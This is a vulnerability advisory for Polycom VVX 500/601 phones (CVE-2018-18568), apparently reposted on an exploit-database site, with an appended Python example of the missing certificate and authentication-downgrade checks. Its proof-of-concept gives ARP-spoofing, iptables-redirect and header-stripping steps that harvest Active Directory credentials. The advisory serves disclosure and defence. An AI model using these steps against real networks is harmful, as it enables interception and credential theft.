0day.today - Biggest Exploit Database in the World.
Polycom VVX 500 / VVX 601 5.8.0.12848 Man-In-The-Middle Vulnerability
Security Risk High
Product:                   VVX 500 / VVX 601
Manufacturer:              Polycom
Affected Version(s):       <= 5.8.0.12848
Tested Version(s):         5.4.0.10182, 5.8.0.12848
Vulnerability Type:        X.509 validation - Man-in-the-Middle (CWE-300)
Risk Level:                Medium
Solution Status:           Open
Manufacturer Notification: 2018-08-29
Solution Date:             20??-??-??
Public Disclosure:         2018-10-23
CVE Reference:             CVE-2018-18568
Author of Advisory:        Micha Borrmann (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

If a Polycom VVX 500/601 [1] is used with an on-premise installation
of Skype for Business, the phone has stored credentials of an account
in the Active Directory. When a man-in-the-middle attack is performed,
the phone gives the credentials to the attacker, and the account is
therefore compromised.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The phone sends the stored credentials to a website usually named
autodiscover via HTTPS, but no X.509 certificate validation is used.
The credentials are sent with the challenge-response NetNTLM algorithm.
With a downgrade attack to HTTP basic authentication, the credentials
can be harvested Base64 encoded.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Use Burp Suite as an invisible proxy. Perform an ARP spoofing attack
against the phone so that its data traffic goes to the device where
Burp Suite is running. All attacks are started from the same device.

# arpspoof -i eth0 -t 192.168.100.101 192.168.100.1

Set an iptables rule so that the traffic is sent to Burp Suite, like

# iptables -A PREROUTING -t nat -i eth0 -s 192.168.100.101 -p tcp --dport 443 -j REDIRECT --to-port 8080

Enable rules in Burp Suite to suppress these two response headers:

WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM

Now, an authentication downgrade attack is in place, too.

Watch the proxy history for an HTTP POST request like

POST /autodiscover/autodiscover.xml HTTP/1.1
Content-Type: text/xml; charset=utf-8
Content-Length: 454
Connection: close
Accept-Encoding: gzip, deflate
Accept-Language: en,*
User-Agent: Mozilla/5.0
Host: autodiscover.example.com
Authorization: Basic ZXhhbXBsZVxBRGFjY291bnRuYW1lOnZlcnl0b3BzZWNyZXRwYXNzd29yZA==

Decode the harvested Base64 encoded credential information.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Install the new firmware, which has a trust store integrated and a
strict X.509 certificate validation policy, too.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2018-08-13: Detection of the vulnerability
2018-08-29: Vulnerability reported to manufacturer
2018-10-22: CVE number assigned
2018-10-23: Public release of the security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product web sites for the phones
    https://support.polycom.com/content/support/emea/emea/en/support/voice/business-media-phones/vvx500.html
    https://support.polycom.com/content/support/emea/emea/en/support/voice/business-media-phones/vvx601.html
[2] SySS Security Advisory SYSS-2018-027
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-027.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy/

# 0day.today [2024-07-05] #
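The two client-side checks whose absence the advisory describes (X.509 validation and refusing a fallback to HTTP basic authentication), as an added example that is not code from the advisory, SySS or Polycom. The function names, the allowed-scheme list and the sample 401 headers are assumptions constructed for illustration.

```python
import re
import ssl

# Assumed policy: only challenge-response schemes may be answered. Basic is
# deliberately absent because it hands over the reusable password itself.
ALLOWED_SCHEMES = ("negotiate", "ntlm")

# Constructed sample 401 headers: the normal offer, and the same response
# after the Negotiate and NTLM challenges were stripped in transit.
NORMAL_401 = [("WWW-Authenticate", "Negotiate"), ("WWW-Authenticate", "NTLM"),
              ("WWW-Authenticate", 'Basic realm="autodiscover.example.com"')]
STRIPPED_401 = [("WWW-Authenticate", 'Basic realm="autodiscover.example.com"')]

# Simplified challenge parser: a scheme is a bare token at the start of the
# value or after a comma; auth parameters (name=value) are skipped.
_SCHEME = re.compile(r"(?:^|,)\s*([A-Za-z][A-Za-z0-9-]*)(?=\s|,|$)")


class AuthDowngradeError(Exception):
    """The response would make the client send weaker credentials."""


def strict_tls_context(ca_file=None):
    """TLS context that validates the certificate chain and the host name."""
    ctx = ssl.create_default_context(cafile=ca_file)
    ctx.check_hostname = True
    ctx.verify_mode = ssl.CERT_REQUIRED
    return ctx


def offered_schemes(headers):
    """Lower-cased schemes from every WWW-Authenticate header, in order."""
    schemes = []
    for name, value in headers:
        if name.lower() == "www-authenticate":
            schemes += [s.lower() for s in _SCHEME.findall(value)]
    return schemes


def select_scheme(headers, peer_verified):
    """Return the scheme to answer a 401 with, or refuse to authenticate."""
    if not peer_verified:
        raise AuthDowngradeError("peer certificate not validated; send nothing")
    offered = offered_schemes(headers)
    for scheme in ALLOWED_SCHEMES:
        if scheme in offered:
            return scheme
    raise AuthDowngradeError(f"only {offered or 'no schemes'} offered; no fallback")
```

With `STRIPPED_401`, `select_scheme` raises instead of answering with Basic, so a client applying this policy sends no reusable password even when the challenge list has been altered in transit.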